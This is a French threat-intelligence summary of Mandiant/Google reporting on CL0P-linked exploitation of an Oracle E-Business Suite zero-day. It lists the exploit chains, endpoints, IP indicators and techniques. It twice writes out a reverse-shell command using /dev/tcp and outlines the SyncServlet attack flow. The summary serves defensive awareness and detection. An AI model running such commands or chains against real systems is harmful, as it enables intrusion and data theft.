Source: Mandiant et Google Threat Intelligence Group. Contexte: une campagne d’extorsion à large échelle, opérée sous la marque CL0P, a exploité une vulnérabilité zero‑day dans Oracle E‑Business Suite (EBS) pour voler des données clients. Oracle a publié un correctif le 4 octobre pour CVE‑2025‑61882, tandis que Mandiant/GTIG documentent plusieurs chaînes d’exploit distinctes visant EBS.

— Chronologie et portée — • Activités d’exploitation probables dès juillet 2025, avant la campagne d’extorsion récente. • Oracle publie le 4 octobre un patch référencé CVE‑2025‑61882. Mandiant/GTIG estiment que les serveurs EBS mis à jour via ce correctif ne sont probablement plus vulnérables aux chaînes d’exploit connues. • L’attribution précise des vulnérabilités aux chaînes d’exploit reste incertaine.

— Chaîne « UiServlet » (juillet 2025) — • Journaux applicatifs EBS indiquant une exploitation visant /OA_HTML/configurator/UiServlet. • Un exploit divulgué le 3 octobre 2025 dans le groupe Telegram « SCATTERED LAPSUS$ HUNTERS », analysé par watchTowr Labs, combine des primitives de SSRF, injection CRLF, contournement d’authentification et injection de templates XSL pour obtenir une exécution de code à distance (RCE). • Post‑exploitation: commandes via sh (Linux) ou cmd.exe (Windows); exemples de shells inversés de type bash -i >& /dev/tcp// 0>&1. • GTIG ne relie pas ces activités à UNC6240 (« Shiny Hunters »).

— Activités avant et après le patch de juillet 2025 — • Avant patch (10 juillet): trafic HTTP suspect depuis 200.107.207.26 vers des serveurs EBS; pas de preuves d’exfiltration XSL ni de commandes, mais exposition parallèle d’un serveur Python AIOHTTP cohérente avec un serveur de rappel d’exploit. • Après patch de juillet: tentatives depuis 161.97.99.49, requêtes HTTP vers /OA_HTML/configurator/UiServlet; des timeouts observés suggèrent l’échec de la SSRF ou de l’étape suivante.

— Chaîne « SyncServlet » (août 2025) — • Exploitation d’une vulnérabilité dans SyncServlet menant à une RCE non authentifiée. • Flux d’attaque: POST sur /OA_HTML/SyncServlet → utilisation de XDO Template Manager pour créer un template malveillant dans la base EBS → déclenchement via la fonctionnalité Template Preview. • Activité provenant de multiples serveurs d’attaque, incluant 200.107.207.26.

— IOCs — • Adresses IP: 200.107.207.26; 161.97.99.49. • Endpoints: /OA_HTML/configurator/UiServlet; /OA_HTML/SyncServlet. • Infra/outils: serveur Python AIOHTTP (callback). • Commandes: shell inversé bash -i >& /dev/tcp// 0>&1; exécution via sh (Linux) / cmd.exe (Windows).

— TTPs — • Primitives: SSRF, injection CRLF, contournement d’authentification, injection de templates XSL. • Effet: exécution de code à distance et déploiement de payloads. • Techniques applicatives EBS: XDO Template Manager (création de template malveillant), Template Preview (déclenchement), requêtes POST vers /OA_HTML/SyncServlet.

Article de type analyse technique visant à déconstruire les chaînes d’exploit observées, leur chronologie et les indicateurs associés dans le contexte d’une campagne d’extorsion.

🧠 TTPs et IOCs détectés

TTP

SSRF, injection CRLF, contournement d’authentification, injection de templates XSL, exécution de code à distance, déploiement de payloads, XDO Template Manager (création de template malveillant), Template Preview (déclenchement), requêtes POST vers /OA_HTML/SyncServlet

IOC

200.107.207.26, 161.97.99.49, /OA_HTML/configurator/UiServlet, /OA_HTML/SyncServlet, serveur Python AIOHTTP

🔗 Source originale : https://cloud.google.com/blog/topics/threat-intelligence/oracle-ebusiness-suite-zero-day-exploitation?hl=en